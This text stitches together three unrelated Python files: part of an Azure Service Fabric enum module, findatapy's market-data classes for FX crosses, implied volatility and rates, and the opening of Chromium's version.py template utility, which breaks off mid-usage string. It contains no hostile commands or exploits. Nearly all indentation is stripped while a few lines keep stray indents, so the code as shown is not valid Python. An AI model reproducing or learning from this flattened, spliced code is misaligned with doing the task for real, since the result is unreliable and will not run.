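# members be looked up with any casing, e.g.
#   Access['allow'] is Access.ALLOW   -> True
#   Access.deny is Access.DENY        -> True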
class ClusterState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current state of the cluster.
"""
#: Indicates that the cluster resource is created and the resource provider is waiting for Service
#: Fabric VM extension to boot up and report to it.
WAITING_FOR_NODES = "WaitingForNodes"
#: Indicates that the Service Fabric runtime is being installed on the VMs. Cluster resource will
#: be in this state until the cluster boots up and system services are up.
DEPLOYING = "Deploying"
    #: Indicates that the cluster is upgrading to establish the cluster version. This upgrade is
#: automatically initiated when the cluster boots up for the first time.
BASELINE_UPGRADE = "BaselineUpgrade"
#: Indicates that the cluster is being upgraded with the user provided configuration.
UPGRADING = "Upgrading"
#: Indicates that the last upgrade for the cluster has failed.
UPGRADE_FAILED = "UpgradeFailed"
#: Indicates that the cluster is in a stable state.
READY = "Ready"
class ClusterUpgradeCadence(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates when new cluster runtime version upgrades will be applied after they are released. By
default is Wave0.
"""
#: Cluster upgrade starts immediately after a new version is rolled out. Recommended for Test/Dev
#: clusters.
WAVE0 = "Wave0"
#: Cluster upgrade starts 7 days after a new version is rolled out. Recommended for Pre-prod
#: clusters.
WAVE1 = "Wave1"
#: Cluster upgrade starts 14 days after a new version is rolled out. Recommended for Production
#: clusters.
WAVE2 = "Wave2"
class ClusterUpgradeMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The upgrade mode of the cluster when new Service Fabric runtime version is available.
"""
#: The cluster will be automatically upgraded to the latest Service Fabric runtime version,
#: **clusterUpgradeCadence** will determine when the upgrade starts after the new version becomes
#: available.
AUTOMATIC = "Automatic"
#: The cluster will not be automatically upgraded to the latest Service Fabric runtime version.
#: The cluster is upgraded by setting the **clusterCodeVersion** property in the cluster resource.
MANUAL = "Manual"
class Direction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Network security rule direction.
"""
INBOUND = "inbound"
OUTBOUND = "outbound"
class DiskType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Managed data disk type. IOPS and throughput are given by the disk size, to see more information
go to https://docs.microsoft.com/en-us/azure/virtual-machines/disks-types.
"""
#: Standard HDD locally redundant storage. Best for backup, non-critical, and infrequent access.
STANDARD_LRS = "Standard_LRS"
#: Standard SSD locally redundant storage. Best for web servers, lightly used enterprise
#: applications and dev/test.
STANDARD_SSD_LRS = "StandardSSD_LRS"
#: Premium SSD locally redundant storage. Best for production and performance sensitive workloads.
PREMIUM_LRS = "Premium_LRS"
class FailureAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The compensating action to perform when a Monitored upgrade encounters monitoring policy or
health policy violations. Invalid indicates the failure action is invalid. Rollback specifies
that the upgrade will start rolling back automatically. Manual indicates that the upgrade will
switch to UnmonitoredManual upgrade mode.
"""
#: Indicates that a rollback of the upgrade will be performed by Service Fabric if the upgrade
#: fails.
ROLLBACK = "Rollback"
#: Indicates that a manual repair will need to be performed by the administrator if the upgrade
#: fails. Service Fabric will not proceed to the next upgrade domain automatically.
MANUAL = "Manual"
class ManagedClusterAddOnFeature(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Available cluster add-on features
"""
DNS_SERVICE = "DnsService"
BACKUP_RESTORE_SERVICE = "BackupRestoreService"
RESOURCE_MONITOR_SERVICE = "ResourceMonitorService"
class ManagedIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of managed identity for the resource.
"""
#: Indicates that no identity is associated with the resource.
NONE = "None"
#: Indicates that system assigned identity is associated with the resource.
SYSTEM_ASSIGNED = "SystemAssigned"
#: Indicates that user assigned identity is associated with the resource.
USER_ASSIGNED = "UserAssigned"
#: Indicates that both system assigned and user assigned identity are associated with the
#: resource.
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
class ManagedResourceProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The provisioning state of the managed resource.
"""
NONE = "None"
CREATING = "Creating"
CREATED = "Created"
UPDATING = "Updating"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
CANCELED = "Canceled"
DELETING = "Deleting"
DELETED = "Deleted"
OTHER = "Other"
class MoveCost(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Specifies the move cost for the service.
"""
#: Zero move cost. This value is zero.
ZERO = "Zero"
#: Specifies the move cost of the service as Low. The value is 1.
LOW = "Low"
#: Specifies the move cost of the service as Medium. The value is 2.
MEDIUM = "Medium"
#: Specifies the move cost of the service as High. The value is 3.
HIGH = "High"
class NsgProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Network protocol this rule applies to.
"""
HTTP = "http"
HTTPS = "https"
TCP = "tcp"
UDP = "udp"
ICMP = "icmp"
AH = "ah"
ESP = "esp"
class PartitionScheme(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enumerates the ways that a service can be partitioned.
"""
#: Indicates that the partition is based on string names, and is a SingletonPartitionScheme
    #: object. The value is 0.
SINGLETON = "Singleton"
#: Indicates that the partition is based on Int64 key ranges, and is a
#: UniformInt64RangePartitionScheme object. The value is 1.
UNIFORM_INT64_RANGE = "UniformInt64Range"
#: Indicates that the partition is based on string names, and is a NamedPartitionScheme object.
#: The value is 2.
NAMED = "Named"
class ProbeProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""the reference to the load balancer probe used by the load balancing rule.
"""
TCP = "tcp"
HTTP = "http"
HTTPS = "https"
class Protocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The reference to the transport protocol used by the load balancing rule.
"""
TCP = "tcp"
UDP = "udp"
class RollingUpgradeMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The mode used to monitor health during a rolling upgrade. The values are Monitored, and
UnmonitoredAuto.
"""
#: The upgrade will stop after completing each upgrade domain and automatically monitor health
#: before proceeding. The value is 0.
MONITORED = "Monitored"
#: The upgrade will proceed automatically without performing any health monitoring. The value is
#: 1.
UNMONITORED_AUTO = "UnmonitoredAuto"
class ServiceCorrelationScheme(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The service correlation scheme.
"""
#: Aligned affinity ensures that the primaries of the partitions of the affinitized services are
#: collocated on the same nodes. This is the default and is the same as selecting the Affinity
#: scheme. The value is 0.
ALIGNED_AFFINITY = "AlignedAffinity"
#: Non-Aligned affinity guarantees that all replicas of each service will be placed on the same
#: nodes. Unlike Aligned Affinity, this does not guarantee that replicas of particular role will
#: be collocated. The value is 1.
NON_ALIGNED_AFFINITY = "NonAlignedAffinity"
class ServiceKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The kind of service (Stateless or Stateful).
"""
#: Does not use Service Fabric to make its state highly available or reliable. The value is 0.
STATELESS = "Stateless"
#: Uses Service Fabric to make its state or part of its state highly available and reliable. The
#: value is 1.
STATEFUL = "Stateful"
class ServiceLoadMetricWeight(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Determines the metric weight relative to the other metrics that are configured for this
service. During runtime, if two metrics end up in conflict, the Cluster Resource Manager
prefers the metric with the higher weight.
"""
#: Disables resource balancing for this metric. This value is zero.
ZERO = "Zero"
#: Specifies the metric weight of the service load as Low. The value is 1.
LOW = "Low"
#: Specifies the metric weight of the service load as Medium. The value is 2.
MEDIUM = "Medium"
#: Specifies the metric weight of the service load as High. The value is 3.
HIGH = "High"
class ServicePackageActivationMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The activation Mode of the service package
"""
#: Indicates the application package activation mode will use shared process.
SHARED_PROCESS = "SharedProcess"
#: Indicates the application package activation mode will use exclusive process.
EXCLUSIVE_PROCESS = "ExclusiveProcess"
class ServicePlacementPolicyType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of placement policy for a service fabric service. Following are the possible values.
"""
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementInvalidDomainPolicyDescription, which indicates that a particular fault or
#: upgrade domain cannot be used for placement of this service. The value is 0.
INVALID_DOMAIN = "InvalidDomain"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementRequireDomainDistributionPolicyDescription indicating that the replicas of the
#: service must be placed in a specific domain. The value is 1.
REQUIRED_DOMAIN = "RequiredDomain"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementPreferPrimaryDomainPolicyDescription, which indicates that if possible the
#: Primary replica for the partitions of the service should be located in a particular domain as
#: an optimization. The value is 2.
PREFERRED_PRIMARY_DOMAIN = "PreferredPrimaryDomain"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementRequireDomainDistributionPolicyDescription, indicating that the system will
#: disallow placement of any two replicas from the same partition in the same domain at any time.
#: The value is 3.
REQUIRED_DOMAIN_DISTRIBUTION = "RequiredDomainDistribution"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementNonPartiallyPlaceServicePolicyDescription, which indicates that if possible all
#: replicas of a particular partition of the service should be placed atomically. The value is 4.
NON_PARTIALLY_PLACE_SERVICE = "NonPartiallyPlaceService"
class ServiceScalingMechanismKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enumerates the ways that a service can be partitioned.
"""
#: Represents a scaling mechanism for adding or removing instances of stateless service partition.
#: The value is 0.
SCALE_PARTITION_INSTANCE_COUNT = "ScalePartitionInstanceCount"
#: Represents a scaling mechanism for adding or removing named partitions of a stateless service.
#: The value is 1.
ADD_REMOVE_INCREMENTAL_NAMED_PARTITION = "AddRemoveIncrementalNamedPartition"
class ServiceScalingTriggerKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enumerates the ways that a service can be partitioned.
"""
#: Represents a scaling trigger related to an average load of a metric/resource of a partition.
#: The value is 0.
AVERAGE_PARTITION_LOAD = "AveragePartitionLoad"
#: Represents a scaling policy related to an average load of a metric/resource of a service. The
#: value is 1.
AVERAGE_SERVICE_LOAD = "AverageServiceLoad"
class SkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Sku Name.
"""
#: Basic requires a minimum of 3 nodes and allows only 1 node type.
BASIC = "Basic"
#: Requires a minimum of 5 nodes and allows 1 or more node type.
STANDARD = "Standard"
|
__author__ = 'saeedamen' # Saeed Amen
#
# Copyright 2016 Cuemacro
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and limitations under the License.
#
"""
Market
The Market object is a higher level object which fetches market data using underlying classes such as MarketDataGenerator. It also
contains several other classes, which are for asset specific instances.
"""
from findatapy.util import DataConstants
# from deco import *
class Market(object):
def __init__(self, market_data_generator = None, md_request = None):
if market_data_generator is None:
if DataConstants().default_market_data_generator == "marketdatagenerator":
from findatapy.market import MarketDataGenerator
market_data_generator = MarketDataGenerator()
elif DataConstants().default_market_data_generator == 'cachedmarketdatagenerator':
# NOT CURRENTLY IMPLEMENTED FOR FUTURE USE
from finexpy.market import CachedMarketDataGenerator
market_data_generator = CachedMarketDataGenerator()
self.market_data_generator = market_data_generator
self.md_request = md_request
def fetch_market(self, md_request = None):
if self.md_request is not None:
md_request = self.md_request
# special cases when a predefined category has been asked
if md_request.category is not None:
if (md_request.category == 'fx-spot-volume' and md_request.data_source == 'quandl'):
# NOT CURRENTLY IMPLEMENTED FOR FUTURE USE
from findatapy.market.fxclsvolume import FXCLSVolume
fxcls = FXCLSVolume(market_data_generator=self.market_data_generator)
return fxcls.get_fx_volume(md_request.start_date, md_request.finish_date, md_request.tickers, cut="LOC", source="quandl",
cache_algo=md_request.cache_algo)
if (md_request.category == 'fx' or md_request.category == 'fx-tot') and md_request.tickers is not None:
fxcf = FXCrossFactory(market_data_generator=self.market_data_generator)
if md_request.category == 'fx':
type = 'spot'
elif md_request.category == 'fx-tot':
type = 'tot'
if (md_request.freq != 'tick' and md_request.fields == ['close']) or (md_request.freq == 'tick' and md_request.data_source == 'dukascopy'):
return fxcf.get_fx_cross(md_request.start_date, md_request.finish_date,
md_request.tickers,
cut = md_request.cut, source = md_request.data_source, freq = md_request.freq, cache_algo=md_request.cache_algo, type = type,
environment = md_request.environment)
if (md_request.category == 'fx-implied-vol'):
if md_request.tickers is not None and md_request.freq == 'daily':
df = []
fxvf = FXVolFactory(market_data_generator=self.market_data_generator)
for t in md_request.tickers:
if len(t) == 6:
df.append(fxvf.get_fx_implied_vol(md_request.start_date, md_request.finish_date, t, fxvf.tenor,
cut=md_request.cut, source=md_request.data_source, part=fxvf.part,
cache_algo_return=md_request.cache_algo))
if df != []:
return Calculations().pandas_outer_join(df)
if(md_request.category == 'fx-vol-market'):
if md_request.tickers is not None:
df = []
fxcf = FXCrossFactory(market_data_generator=self.market_data_generator)
fxvf = FXVolFactory(market_data_generator=self.market_data_generator)
rates = RatesFactory(market_data_generator=self.market_data_generator)
for t in md_request.tickers:
if len(t) == 6:
df.append(fxcf.get_fx_cross(start=md_request.start_date, end=md_request.finish_date, cross=t,
cut=md_request.cut, source=md_request.data_source, freq=md_request.freq,
cache_algo=md_request.cache_algo, type='spot', environment=md_request.environment,
fields=['close']))
df.append(fxvf.get_fx_implied_vol(md_request.start_date, md_request.finish_date, t, fxvf.tenor,
cut=md_request.cut, source=md_request.data_source,
part=fxvf.part,
cache_algo=md_request.cache_algo))
df.append(rates.get_fx_forward_points(md_request.start_date, md_request.finish_date, t, fxvf.tenor,
cut=md_request.cut, source=md_request.data_source,
cache_algo=md_request.cache_algo))
df.append(rates.get_base_depos(md_request.start_date, md_request.finish_date, ["USD", "EUR", "CHF", "GBP"], fxvf.tenor,
cut=md_request.cut, source=md_request.data_source,
cache_algo=md_request.cache_algo
))
if df != []:
return Calculations().pandas_outer_join(df)
# TODO add more special examples here for different asset classes
# the idea is that we do all the market data downloading here, rather than elsewhere
# by default: pass the market data request to MarketDataGenerator
return self.market_data_generator.fetch_market_data(md_request)
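# Minimal usage sketch (not part of the original module; the data source, ticker and dates
# below are illustrative only):
#
#   market = Market(market_data_generator=MarketDataGenerator())
#   md_request = MarketDataRequest(start_date='01 Jan 2015', finish_date='01 Jun 2015',
#                                  category='fx', data_source='quandl', freq='daily',
#                                  tickers=['EURUSD'], fields=['close'])
#   df = market.fetch_market(md_request)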
########################################################################################################################
"""
FXCrossFactory
Class generates FX spot time series and FX total return time series (assuming we already have
total return indices available from xxxUSD form) from underlying series.
"""
from findatapy.market.marketdatarequest import MarketDataRequest
from findatapy.timeseries import Calculations
from findatapy.util.fxconv import FXConv
from findatapy.util.loggermanager import LoggerManager
class FXCrossFactory(object):
def __init__(self, market_data_generator = None):
self.logger = LoggerManager().getLogger(__name__)
self.fxconv = FXConv()
self.cache = {}
self.calculations = Calculations()
self.market_data_generator = market_data_generator
return
def flush_cache(self):
self.cache = {}
def get_fx_cross_tick(self, start, end, cross,
cut = "NYC", source = "dukascopy", cache_algo = 'internet_load_return', type = 'spot',
environment = 'backtest', fields = ['bid', 'ask']):
if isinstance(cross, str):
cross = [cross]
market_data_request = MarketDataRequest(
gran_freq="tick",
freq_mult = 1,
freq = 'tick',
cut = cut,
fields = ['bid', 'ask', 'bidv', 'askv'],
cache_algo=cache_algo,
environment = environment,
start_date = start,
finish_date = end,
data_source = source,
category = 'fx'
)
market_data_generator = self.market_data_generator
data_frame_agg = None
for cr in cross:
if (type == 'spot'):
market_data_request.tickers = cr
cross_vals = market_data_generator.fetch_market_data(market_data_request)
# if user only wants 'close' calculate that from the bid/ask fields
if fields == ['close']:
                    cross_vals = cross_vals[[cr + '.bid', cr + '.ask']].mean(axis=1).to_frame()
cross_vals.columns = [cr + '.close']
else:
filter = Filter()
filter_columns = [cr + '.' + f for f in fields]
cross_vals = filter.filter_time_series_by_columns(cross_vals, filter_columns)
if data_frame_agg is None:
data_frame_agg = cross_vals
else:
data_frame_agg = data_frame_agg.join(cross_vals, how='outer')
# strip the nan elements
data_frame_agg = data_frame_agg.dropna()
return data_frame_agg
def get_fx_cross(self, start, end, cross,
cut = "NYC", source = "bloomberg", freq = "intraday", cache_algo='internet_load_return', type = 'spot',
environment = 'backtest', fields = ['close']):
if source == "gain" or source == 'dukascopy' or freq == 'tick':
return self.get_fx_cross_tick(start, end, cross,
cut = cut, source = source, cache_algo = cache_algo, type = 'spot', fields = fields)
if isinstance(cross, str):
cross = [cross]
market_data_request_list = []
freq_list = []
type_list = []
for cr in cross:
market_data_request = MarketDataRequest(freq_mult=1,
cut=cut,
fields=['close'],
freq=freq,
cache_algo=cache_algo,
start_date=start,
finish_date=end,
data_source=source,
environment=environment)
market_data_request.type = type
market_data_request.cross = cr
if freq == 'intraday':
market_data_request.gran_freq = "minute" # intraday
elif freq == 'daily':
market_data_request.gran_freq = "daily" # daily
market_data_request_list.append(market_data_request)
data_frame_agg = []
# depends on the nature of operation as to whether we should use threading or multiprocessing library
        if DataConstants().market_thread_technique == "thread":
from multiprocessing.dummy import Pool
else:
            # most of the time is spent waiting for Bloomberg to return, so can use threads rather than multiprocessing
# must use the multiprocessing_on_dill library otherwise can't pickle objects correctly
# note: currently not very stable
from multiprocessing_on_dill import Pool
thread_no = DataConstants().market_thread_no['other']
if market_data_request_list[0].data_source in DataConstants().market_thread_no:
thread_no = DataConstants().market_thread_no[market_data_request_list[0].data_source]
# fudge, issue with multithreading and accessing HDF5 files
# if self.market_data_generator.__class__.__name__ == 'CachedMarketDataGenerator':
# thread_no = 0
if (thread_no > 0):
pool = Pool(thread_no)
# open the market data downloads in their own threads and return the results
result = pool.map_async(self._get_individual_fx_cross, market_data_request_list)
data_frame_agg = self.calculations.iterative_outer_join(result.get())
# data_frame_agg = self.calculations.pandas_outer_join(result.get())
# pool would have already been closed earlier
# try:
# pool.close()
# pool.join()
# except: pass
else:
for md_request in market_data_request_list:
data_frame_agg.append(self._get_individual_fx_cross(md_request))
data_frame_agg = self.calculations.pandas_outer_join(data_frame_agg)
# strip the nan elements
data_frame_agg = data_frame_agg.dropna()
return data_frame_agg
def _get_individual_fx_cross(self, market_data_request):
cr = market_data_request.cross
type = market_data_request.type
freq = market_data_request.freq
base = cr[0:3]
terms = cr[3:6]
if (type == 'spot'):
# non-USD crosses
if base != 'USD' and terms != 'USD':
base_USD = self.fxconv.correct_notation('USD' + base)
terms_USD = self.fxconv.correct_notation('USD' + terms)
# TODO check if the cross exists in the database
# download base USD cross
market_data_request.tickers = base_USD
market_data_request.category = 'fx'
if base_USD + '.close' in self.cache:
base_vals = self.cache[base_USD + '.close']
else:
base_vals = self.market_data_generator.fetch_market_data(market_data_request)
self.cache[base_USD + '.close'] = base_vals
# download terms USD cross
market_data_request.tickers = terms_USD
market_data_request.category = 'fx'
if terms_USD + '.close' in self.cache:
terms_vals = self.cache[terms_USD + '.close']
else:
terms_vals = self.market_data_generator.fetch_market_data(market_data_request)
self.cache[terms_USD + '.close'] = terms_vals
# if quoted USD/base flip to get USD terms
if (base_USD[0:3] == 'USD'):
                    if 'USD' + base + '.close' in self.cache:
base_vals = self.cache['USD' + base + '.close']
else:
base_vals = 1 / base_vals
self.cache['USD' + base + '.close'] = base_vals
# if quoted USD/terms flip to get USD terms
if (terms_USD[0:3] == 'USD'):
                    if 'USD' + terms + '.close' in self.cache:
terms_vals = self.cache['USD' + terms + '.close']
else:
terms_vals = 1 / terms_vals
                        self.cache['USD' + terms + '.close'] = terms_vals
                base_vals.columns = ['temp']
                terms_vals.columns = ['temp']
cross_vals = base_vals.div(terms_vals, axis='index')
cross_vals.columns = [cr + '.close']
base_vals.columns = [base_USD + '.close']
terms_vals.columns = [terms_USD + '.close']
else:
# if base == 'USD': non_USD = terms
# if terms == 'USD': non_USD = base
correct_cr = self.fxconv.correct_notation(cr)
market_data_request.tickers = correct_cr
market_data_request.category = 'fx'
if correct_cr + '.close' in self.cache:
cross_vals = self.cache[correct_cr + '.close']
else:
cross_vals = self.market_data_generator.fetch_market_data(market_data_request)
# flip if not convention
if (correct_cr != cr):
if cr + '.close' in self.cache:
cross_vals = self.cache[cr + '.close']
else:
cross_vals = 1 / cross_vals
self.cache[cr + '.close'] = cross_vals
self.cache[correct_cr + '.close'] = cross_vals
# cross_vals = self.market_data_generator.harvest_time_series(market_data_request)
cross_vals.columns.names = [cr + '.close']
elif type[0:3] == "tot":
if freq == 'daily':
# download base USD cross
market_data_request.tickers = base + 'USD'
market_data_request.category = 'fx-tot'
if type == "tot":
base_vals = self.market_data_generator.fetch_market_data(market_data_request)
else:
x = 0
# download terms USD cross
market_data_request.tickers = terms + 'USD'
market_data_request.category = 'fx-tot'
if type == "tot":
terms_vals = self.market_data_generator.fetch_market_data(market_data_request)
else:
pass
base_rets = self.calculations.calculate_returns(base_vals)
terms_rets = self.calculations.calculate_returns(terms_vals)
cross_rets = base_rets.sub(terms_rets.iloc[:, 0], axis=0)
                # the first return of a time series will be NaN, given we don't know the previous point
cross_rets.iloc[0] = 0
cross_vals = self.calculations.create_mult_index(cross_rets)
cross_vals.columns = [cr + '-tot.close']
elif freq == 'intraday':
self.logger.info('Total calculated returns for intraday not implemented yet')
return None
return cross_vals
#######################################################################################################################
"""
FXVolFactory
Class generates FX implied volatility time series and surfaces (using very simple interpolation!).
"""
import pandas
from findatapy.market.marketdatarequest import MarketDataRequest
from findatapy.util import LoggerManager
from findatapy.timeseries import Calculations, Filter, Timezone
class FXVolFactory(object):
# types of quotation on vol surface
# ATM, 25d riskies, 10d riskies, 25d strangles, 10d strangles
part = ["V", "25R", "10R", "25B", "10B"]
# all the tenors on our vol surface
tenor = ["ON", "1W", "2W", "3W", "1M", "2M", "3M", "6M", "9M", "1Y", "2Y", "3Y", "5Y"]
def __init__(self, market_data_generator=None):
self.logger = LoggerManager().getLogger(__name__)
self.market_data_generator = market_data_generator
self.calculations = Calculations()
self.filter = Filter()
self.timezone = Timezone()
self.rates = RatesFactory()
return
def get_fx_implied_vol(self, start, end, cross, tenor, cut="BGN", source="bloomberg", part="V",
cache_algo="internet_load_return"):
""" get_implied_vol = get implied vol for specified cross, tenor and part of surface
:param start: start date
:param end: end date
:param cross: asset to be calculated
:param tenor: tenor to calculate
:param cut: closing time of data
:param source: source of data eg. bloomberg
:param part: part of vol surface eg. V for ATM implied vol, 25R 25 delta risk reversal
        :return: implied volatility quotes for the requested crosses, tenors and surface parts
"""
market_data_generator = self.market_data_generator
if isinstance(cross, str): cross = [cross]
if isinstance(tenor, str): tenor = [tenor]
if isinstance(part, str): part = [part]
tickers = []
for cr in cross:
for tn in tenor:
for pt in part:
tickers.append(cr + pt + tn)
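        # e.g. cross 'EURUSD', part 'V', tenor '1M' gives the ticker 'EURUSDV1M' (1M ATM implied vol)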
market_data_request = MarketDataRequest(
start_date=start, finish_date=end,
data_source=source,
category='fx-implied-vol',
freq='daily',
cut=cut,
tickers=tickers,
fields=['close'],
cache_algo=cache_algo,
environment='backtest'
)
data_frame = market_data_generator.fetch_market_data(market_data_request)
data_frame.index.name = 'Date'
return data_frame
def extract_vol_surface_for_date(self, df, cross, date_index):
# assume we have a matrix of the form
# eg. EURUSDVON.close ...
# types of quotation on vol surface
# self.part = ["V", "25R", "10R", "25B", "10B"]
# all the tenors on our vol surface
# self.tenor = ["ON", "1W", "2W", "3W", "1M", "2M", "3M", "6M", "9M", "1Y", "2Y", "5Y"]
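        # Worked example (illustrative numbers): with ATM = 10.0, 25R = 1.0 and 25B = 0.3,
        #   25DP vol = 10.0 - 1.0/2 + 0.3 = 9.8
        #   25DC vol = 10.0 + 1.0/2 + 0.3 = 10.8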
strikes = ["10DP",
"25DP",
"ATM",
"25DC",
"10DC"]
tenor = self.tenor
df_surf = pandas.DataFrame(index=strikes, columns=tenor)
for ten in tenor:
df_surf.ix["10DP", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
- (df.ix[date_index, cross + "10R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "10B" + ten + ".close"])
df_surf.ix["10DC", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
+ (df.ix[date_index, cross + "10R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "10B" + ten + ".close"])
df_surf.ix["25DP", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
- (df.ix[date_index, cross + "25R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "25B" + ten + ".close"])
df_surf.ix["25DC", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
+ (df.ix[date_index, cross + "25R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "25B" + ten + ".close"])
df_surf.ix["ATM", ten] = df.ix[date_index, cross + "V" + ten + ".close"]
return df_surf
#######################################################################################################################
class RatesFactory(object):
def __init__(self, market_data_generator=None):
self.logger = LoggerManager().getLogger(__name__)
self.cache = {}
self.calculations = Calculations()
self.market_data_generator = market_data_generator
return
# all the tenors on our forwards
# forwards_tenor = ["ON", "1W", "2W", "3W", "1M", "2M", "3M", "6M", "9M", "1Y", "2Y", "3Y", "5Y"]
def get_base_depos(self, start, end, currencies, tenor, cut="NYC", source="bloomberg",
cache_algo="internet_load_return"):
""" get_forward_points = get forward points for specified cross, tenor and part of surface
:param start: start date
:param end: end date
:param cross: asset to be calculated
:param tenor: tenor to calculate
:param cut: closing time of data
:param source: source of data eg. bloomberg
:return: forward points
"""
market_data_generator = self.market_data_generator
if isinstance(currencies, str): currencies = [currencies]
if isinstance(tenor, str): tenor = [tenor]
tickers = []
for cr in currencies:
for tn in tenor:
tickers.append(cr + tn)
market_data_request = MarketDataRequest(
start_date=start, finish_date=end,
data_source=source,
category='base-depos',
freq='daily',
cut=cut,
tickers=tickers,
fields=['close'],
cache_algo=cache_algo,
environment='backtest'
)
data_frame = market_data_generator.fetch_market_data(market_data_request)
data_frame.index.name = 'Date'
return data_frame
def get_fx_forward_points(self, start, end, cross, tenor, cut="BGN", source="bloomberg",
cache_algo="internet_load_return"):
""" get_forward_points = get forward points for specified cross, tenor and part of surface
:param start: start date
:param end: end date
:param cross: asset to be calculated
:param tenor: tenor to calculate
:param cut: closing time of data
:param source: source of data eg. bloomberg
:return: forward points
"""
market_data_request = MarketDataRequest()
market_data_generator = self.market_data_generator
market_data_request.data_source = source # use bbg as a source
market_data_request.start_date = start # start_date
market_data_request.finish_date = end # finish_date
if isinstance(cross, str): cross = [cross]
if isinstance(tenor, str): tenor = [tenor]
tenor = [x.replace('1Y', '12M') for x in tenor]
tickers = []
for cr in cross:
for tn in tenor:
tickers.append(cr + tn)
market_data_request = MarketDataRequest(
start_date = start, finish_date = end,
data_source = source,
category = 'fx-forwards',
freq = 'daily',
cut = cut,
tickers=tickers,
fields = ['close'],
cache_algo = cache_algo,
environment = 'backtest'
)
data_frame = market_data_generator.fetch_market_data(market_data_request)
data_frame.columns = [x.replace('12M', '1Y') for x in data_frame.columns]
data_frame.index.name = 'Date'
return data_frame
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# (See http://src.chromium.org/viewvc/chrome/trunk/src/LICENSE)
# This file itself is from
# http://src.chromium.org/viewvc/chrome/trunk/src/build/util/ as of
# revision r252481
"""
version.py -- Chromium version string substitution utility.
"""
import getopt
import os
import sys
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def fetch_values_from_file(values_dict, file_name):
"""
Fetches KEYWORD=VALUE settings from the specified file.
Everything to the left of the first '=' is the keyword,
everything to the right is the value. No stripping of
white space, so beware.
The file must exist, otherwise you get the Python exception from open().
"""
for line in open(file_name, 'r').readlines():
key, val = line.rstrip('\r\n').split('=', 1)
values_dict[key] = val
def fetch_values(file_list):
"""
Returns a dictionary of values to be used for substitution, populating
the dictionary with KEYWORD=VALUE settings from the files in 'file_list'.
Explicitly adds the following value from internal calculations:
OFFICIAL_BUILD
"""
CHROME_BUILD_TYPE = os.environ.get('CHROME_BUILD_TYPE')
if CHROME_BUILD_TYPE == '_official':
official_build = '1'
else:
official_build = '0'
values = dict(
OFFICIAL_BUILD = official_build,
)
for file_name in file_list:
fetch_values_from_file(values, file_name)
return values
def subst_template(contents, values):
"""
Returns the template with substituted values from the specified dictionary.
Keywords to be substituted are surrounded by '@': @KEYWORD@.
No attempt is made to avoid recursive substitution. The order
of evaluation is random based on the order of the keywords returned
by the Python dictionary. So do NOT substitute a value that
contains any @KEYWORD@ strings expecting them to be recursively
substituted, okay?
"""
for key, val in values.iteritems():
try:
contents = contents.replace('@' + key + '@', val)
except TypeError:
print repr(key), repr(val)
return contents
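# Illustrative example (hypothetical values): given the template string
# "v@MAJOR@.@MINOR@" and values {'MAJOR': '42', 'MINOR': '0'},
# subst_template() returns "v42.0".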
def subst_file(file_name, values):
"""
  Returns the contents of the specified file_name with substituted
values from the specified dictionary.
This is like subst_template, except it operates on a file.
"""
template = open(file_name, 'r').read()
  return subst_template(template, values)
def write_if_changed(file_name, contents):
"""
Writes the specified contents to the specified file_name
iff the contents are different than the current contents.
"""
try:
old_contents = open(file_name, 'r').read()
except EnvironmentError:
pass
else:
if contents == old_contents:
return
os.unlink(file_name)
open(file_name, 'w').write(contents)
def main(argv=None):
if argv is None:
argv = sys.argv
short_options = 'e:f:i:o:t:h'
long_options = ['eval=', 'file=', 'help']
helpstr = """\
Usage: version.py [-h] [-f FILE] ([[-i] FILE] | -t TEMPLATE) [[-o] FILE]
